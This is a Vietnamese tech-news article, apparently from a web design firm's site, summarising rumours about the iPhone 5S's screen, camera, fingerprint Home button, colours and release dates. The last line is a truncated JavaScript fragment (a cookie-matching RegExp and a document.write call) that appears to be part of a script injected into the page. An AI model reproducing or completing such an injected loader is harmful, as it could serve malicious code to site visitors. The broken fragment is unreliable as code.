Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > Chân dung của iPhone 5S qua các tin đồn

Chân dung của iPhone 5S qua các tin đồn

Càng cận kề ngày ra mắt, những tin đồn về iPhone 5S lại càng xuất hiện nhiều trên các trang thông tin, diễn dàn công nghệ. Người dùng cũng đã phần nào hình dung ra được diện mạo chiếc điện thoại siêu phẩm mới của Apple.

iPhone 5S sẽ chạy hệ điều hành iOS 7

Năm 2012, Apple cũng đã giới thiệu hệ điều hành iOS 6, đến tháng 9 đã cho ra mắt iPhone 5. Đến nay đã hơn 1 năm, iOS 7 đã kịp chào saan cùng với iPhone thế hệ mới. Hiện tại thì các lập trình viên cũng đang làm việc trên phiên bản iOS 7 Beta.

iOS 7 sẽ mang lại những cải tiến mới cho iPhone 5S

Hệ điều hành iOS mới này sẽ có một sự thay đổi lớn về giao diện người dùng, các biểu tượng được thiết kế thời trang hơn, Control Center cũng sẽ được làm mới để thân thiện hơn với người dùng.

Màn hình siêu cảm ứng ‘Touch On’

Theo tờ báo China Times, 5S sẽ được trang bị màn hình Retina 4.8 inch, cảm ứng 10 điểm, dày 0.5 mm, độ phân giải có thể lên đến 1080p Full HD.

Một nguồn tin khác cũng cho hay rằng iPhone thế hệ mới sẽ có 2 phiên bản với kích thước khác nhau, 5S có kích thước lớn sẽ là đối thủ của các mẫu Android có màn hình lớn trên thị trường smartphone. Màn hình của iPhone thế hệ mới được cho là sẽ có độ phân giải gấp đôi so với iPhone 5, đạt đến 1.5 triệu điểm ảnh, viền màn hình được làm mỏng hơn.

Nếu những thông tin trên là thật thì màn hình của iPhone mới sẽ là một bước tiến lớn của Apple so với iPhone 5, màn hình của iPhone 5 có độ phân giải là 640 x 1136 px, mật độ điểm anh 326ppi.

Màn hình siêu cảm ứng của iPhone 5S

Tuy nhiên, theo hàng loạt nguồn tin rò rỉ cho thấy “Quả táo cắn dở” vẫn giữ nguyên kích thước màn hình là 4 inch ở cả 2 mẫu iPhone 5S và iPhone 5C. Apple có thể sẽ chỉ tăng cường độ phân giải, sử dụng công nghệ cho phép hiển thị hình ảnh tốt hơn nhưng vẫn trung thành với kiểu dáng gọn.

Camera 8 megapixel, chụp ảnh đẹp hơn

Đầu năm 2013, trang iLounge đã đưa tin chiếc iPhone thế hệ mới sẽ có thiết kế tương tự với người anh em của nó. Sự khác biệt của chiếc 5S này là ở camera 13 Mpx, đền Flash tốt hơn.

iPhone 5S được trang bị camera 8 "chấm"

 

Tuy nhiên, gần đây nhà phân tích Ming Chi-Kou từ KGI Secutities, ông này đã bắt đầu nổi tiếng với lần dự đoán cấu hình của iPhone 5, cho rằng camera của 5S vẫn chỉ dừng lại ở mức 8 Mpx, nhưng nó được cải thiện chất lượng ảnh và tăng cường thêm đèn Flash kép.

Nút Home bí ẩn

Nguồn tin từ đầu năm 2013 cho thấy, iPhone thế hệ mới sẽ được trang bị cảm biến vân tay ở nút Home, được cắm một lớp đá sapphire. Tuy nhiên, theo như những hình ảnh bị rò rỉ gần đây cho thấy nút Home trên chiếc iPhone mới sẽ không có nhiều sự thay đổi so với iPhone cũ, không có bất kỳ một dấu hiệu nào về một bộc cảm biến sinh trắc học ở mặt trước của iPhpne 5S hoặc là do Apple đã ẩn giấu cảm biến này một cách tài tình.

Nút Home bí ẩn trên iPhone 5S

Ngoài những thành phần chính kể trên, các chi tiết phụ của iPhone mới cũng được đưa vào tầm ngắm của giới thạo tin. Theo đó, thời lượng pin của sản phẩm sẽ lâu hơn, hỗ trợ giao tiếp NFC và đi kèm là sạc không dây.

Bên cạnh phiên bản màu trắng, đen thì iPhone 5S có thể sẽ có thêm màu vàng sâm panh, màu bạc kim loại, iPhone mới này và iPhone 5C sẽ được Apple chính thức giới thiệu vào ngày 10/9 tới đây, và phải đến 25/10 thì 2 thiết bị này mới có thể đến tay người tiêu dùng.

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘